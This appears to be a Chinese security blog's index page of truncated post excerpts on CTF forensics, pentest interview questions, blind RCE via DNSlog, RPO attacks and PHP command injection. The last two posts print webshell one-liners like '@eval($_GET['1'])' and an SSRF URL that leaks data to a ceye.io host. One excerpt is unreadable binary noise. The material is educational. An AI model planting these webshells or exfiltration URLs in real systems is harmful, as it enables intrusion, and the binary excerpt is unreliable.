菠萝吹雪's Studio.

菠萝吹雪's Studio.

菜鸡菠萝学习ing...

hfctf 取证misc
奇怪的组织打开压缩包,出题人把部分c盘目录放在了压缩包里,首先发现安装了phpstudy,Thunderbird,xshell6,firefox这些软件首先查看一下Thunderbird底下的邮件信息1Thunder\Users\bob\AppData\Roaming\Thunderbird\Profiles\7ev2i8k4.default-release\global-messages-db.sqlite 发现一堆emoji,点开短链接,是codemoji的网站,了解了一下加密过程,是一对一的单表替换加密,找到一个类似的项目可以爆破密钥,只能解密用codemoji加密过的数据,邮件里...
一些甲方和乙方的面经
临近春招,看到身边的师傅都找到了不错的实习岗,觉得是时候去试一试了,一共面了3家,都感觉不错,纠结了很久Orz星阑科技起初也是看到有师傅在朋友圈里发了星阑的招聘,身边一大堆认识的师傅去了星阑,想试试,是浩歌子师傅在做红队相关的东西,面试是朱师傅和浩子师傅面的我,朱师傅因为之前一起打过比赛,还是比较熟悉,也有点小尴尬,XD1.常见的端口,敏感的端口?2.sql注入中常见的报错函数?3.渗透测试的基本流程?4.对于redis数据库你有什么利用手法?5.对于csrf,你有深入利用过吗?,他的原理是什么?6.有用过cs吗?对于webshell执行命令或者木马.exe被杀软拦截,有什么bypass...
一些面试题目总结
写在最前最近比较闲,想先熟悉熟悉面试流程(也在渗透 看看大公司的面试流程以及技术面的题目,正巧身边的熟人也在面试(攻防工程师),带来几道面试题目 奇安信主要还是涉及内网 1.内网环境如果只有cmd和目标服务器的账号密码,如何确认目标服务器是否能登陆。?2.对于MySQL+PHP+Windows的环境,如果存在注入,如何提高注入效率?3.mimikatz是从哪个进程抓的hash?4.如何在内网环境中找到域控(至少10种方法)?5.已知一公司环境存在域控,如果不在域环境内,如何寻找域控?6.内网渗透横向扩展有那几种方法(至少5种)?7.内网中,如果拿到一台机器或者多台机器的hash,如果ha...
rce无回显的一种办法
前言看到飘零师傅的一篇文章受到启发1https://skysec.top/2017/12/29/Time-Based-RCE/ 在比赛或者实际渗透的时候常会遇到命令执行无回显的情况,在这里记录一下。 1.利用ceye.io将回显带出这种方法实际上运用了DNSlog注入,通过读取多级域名的解析日志,来获取信息。简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。事实上适用于很多无回显的情况.例如:针对ssrf无回显的情况,可以采用这种方法1http://www.111.222.333.com/index.php?url=http://ip.port.b182oj.cey...
关于RPO攻击的一些东西
什么是RPO攻击RPO(Relative Path Overwrite)相对路径覆盖,原理是浏览器解析页面路径有误而导致css文件加载路径错误导致的任意文件解析在相对路径处,引入我们可控的js/css文件,甚至引入非js/css文件,并按照js/css的语法执行,从而实现攻击。 PATHINFO URL模式在解释漏洞前看一个知识点,什么是pathinfo?例如1http://www.a.com/index.php/a/b/c/ 这里index.php 后面的路径显然不存在,pathinfo就是在url路径实际上不存在的时候,apache等通过一定的手段将不存在的路劲保存到环境变量$_S...
[Untitled Post]
nn$�.@% ��l �j�?�o���S�Vm����W=;f�~��YV��/� w�E�K�4,�V�&��� [j&�q��RǬL�p�w����$��JJ�p���N����xe}x�^krY,�L�S�K�.��v���nk0�<z��6 �w�f��#�@����=G�s�.{����tc��e�+#���u~Owv”A��qUYC[�����~�P��c�muxjcijW�}1Å�vo��˾4L��r��t�� &���}������VjV������LH�w���x�ަ�5›...
[Untitled Post]
#!/usr/bin/env node var mime = require(‘./mime.js’);var file = process.argv[2];var type = mime.lookup(file); process.stdout.write(type + ‘\n’);
记PHP命令注入函数
记PHP命令注入函数前言最近开始学php代码审计,码一下审计过程中可能出现的命令注入函数,以后遇到别的姿势会更新 1.eval,assert,system关于system函数就不说明了关于eval,和assert的区别可以看smi1e师傅的文章:1https://www.smi1e.top/%E6%B5%85%E8%B0%88eval%E5%92%8Cassert/ 1234567891011<?php @eval($_GET['1']);?><?php @assert($_POST['1']);?><?php @system($_GET["1"]);?...
avatar
b1cx
潜心学技术,低调求发展
FRIENDS
dispa1r 离怀秋